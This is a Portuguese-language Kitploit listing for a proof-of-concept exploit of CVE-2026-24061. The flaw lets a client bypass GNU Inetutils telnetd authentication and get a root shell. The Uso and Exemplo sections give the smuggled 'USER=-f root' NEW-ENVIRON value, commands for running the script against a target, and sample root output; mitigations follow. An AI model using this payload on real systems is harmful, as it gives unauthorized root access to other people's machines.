Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell- — Prova de conceito de exploit para bypass de autenticação no telnetd do GNU Inetutils (CVE-2026-24061) que gera um shell root por meio da variável USER NEW-ENVIRON manipulada. | Kitploit
Ferramentas/GitHubGitHub/mbanyamer/cve-2026-24061-gnu-inetutils-telnetd-remote-authentication-bypass-root-shell-
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoFerramenta de Acesso Remoto
GitHubmbanyamer/cve-2026-24061-gnu-inetutils-telnetd-remote-authentication-bypass-root-shell-

CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell-

Prova de conceito de exploit para bypass de autenticação no telnetd do GNU Inetutils (CVE-2026-24061) que gera um shell root por meio da variável USER NEW-ENVIRON manipulada.

Ver Repositório
6há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Author Role Country Platform Vulnerability CVE CVSS Status


🧨 Visão Geral

Este repositório contém um exploit de Prova‑de‑Conceito para a vulnerabilidade de bypass de autenticação remota no GNU Inetutils telnetd.

O problema surge porque o telnetd sanitiza incorretamente a variável de ambiente USER recebida via negociação Telnet NEW‑ENVIRON antes de invocar o /bin/login.

Ao fornecer:

root@kitploit:~
USER=-f root

o telnetd efetivamente executa:

root@kitploit:~
/bin/login -f root

o que contorna a autenticação e gera um shell root imediato.

  • Produto: GNU Inetutils telnetd
  • Versões Afetadas: ≤ 2.7
  • Porta: 23/TCP
  • Autenticação: Não necessária
  • Impacto: Bypass de Autenticação → Shell Root
  • Privilégios: root
  • CVE: CVE‑2026‑24061
  • CVSS: 9.8 (Crítico)

⚙️ Detalhes Técnicos

O Telnet NEW‑ENVIRON permite que clientes definam variáveis de ambiente durante a negociação da sessão.

O telnetd vulnerável passa USER diretamente para o login:

root@kitploit:~
/bin/login -f "$USER"

Um atacante define:

root@kitploit:~
USER=-f root

Resultado:

root@kitploit:~
/bin/login -f root

A flag -f instrui o login a ignorar a autenticação, concedendo acesso root.


📦 Requisitos

  • Python 3
  • telnetlib (biblioteca padrão)
  • Alvo executando inetutils‑telnetd vulnerável ≤ 2.7
  • Serviço Telnet acessível em TCP/23

Nenhuma dependência externa necessária.


🚀 Uso

1️⃣ Executar o Exploit

root@kitploit:~
python3 cve-2026-24061.py 192.168.1.100

2️⃣ Porta Opcional

root@kitploit:~
python3 cve-2026-24061.py example.com 23

3️⃣ Resultado Esperado

Se vulnerável:

root@kitploit:~
# id
uid=0(root) gid=0(root)
#

Você agora tem um shell root interativo.


🧪 Exemplo

root@kitploit:~
python3 cve-2026-24061.py 10.10.10.20

Saída:

root@kitploit:~
[+] Conectado a 10.10.10.20:23
[+] Enviado USER=-f root malicioso via NEW-ENVIRON
[+] Negociação concluída - entrando no shell interativo
#

🧯 Notas

  • O exploit é instantâneo
  • Nenhuma força bruta necessária
  • Nenhuma credencial necessária
  • Observado sendo explorado na natureza
  • Funciona em instalações padrão do inetutils‑telnetd Debian/Ubuntu
  • Falha se o telnetd for corrigido ou substituído (ex.: OpenBSD telnetd)

🛡️ Mitigação

  • Atualizar GNU Inetutils ≥ 2.8
  • Desativar o serviço telnet
  • Substituir por SSH
  • Bloquear TCP/23 no firewall
  • Auditar pacotes inetutils‑telnetd

📊 Fluxo de Ataque do PoC

root@kitploit:~
sequenceDiagram
    participant A as Atacante
    participant T as telnetd alvo
    participant L as /bin/login
    participant R as Shell Root

    A->>T: Conectar TCP/23
    A->>T: Telnet NEW-ENVIRON USER=-f root
    T->>L: Executar /bin/login -f root
    L-->>T: Bypass de autenticação bem-sucedido
    T-->>R: Gerar shell root
    R-->>A: Sessão root interativa

⚠️ Aviso Legal

Este exploit é fornecido para:

  • Pesquisa de segurança
  • Testes de penetração autorizados
  • Validação defensiva

O uso não autorizado contra sistemas que você não possui ou não tem permissão para testar é ilegal.

Baixar ferramenta